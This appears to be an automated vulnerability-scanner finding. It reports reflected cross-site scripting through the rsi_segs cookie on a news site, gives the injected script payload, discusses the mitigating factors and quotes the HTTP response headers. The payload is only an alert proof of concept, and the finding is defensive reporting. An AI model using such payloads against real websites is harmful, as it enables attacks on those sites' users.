The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c769"><script>alert(1)</script>cb747b70efd was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html; charset=UTF-8 X-Instance-Name: i6s29z1n1 Expires: Sun, 12 Dec 2010 18:54:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:54:15 GMT Connection: close Vary: Accept-Encoding Content-Length: 138201
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">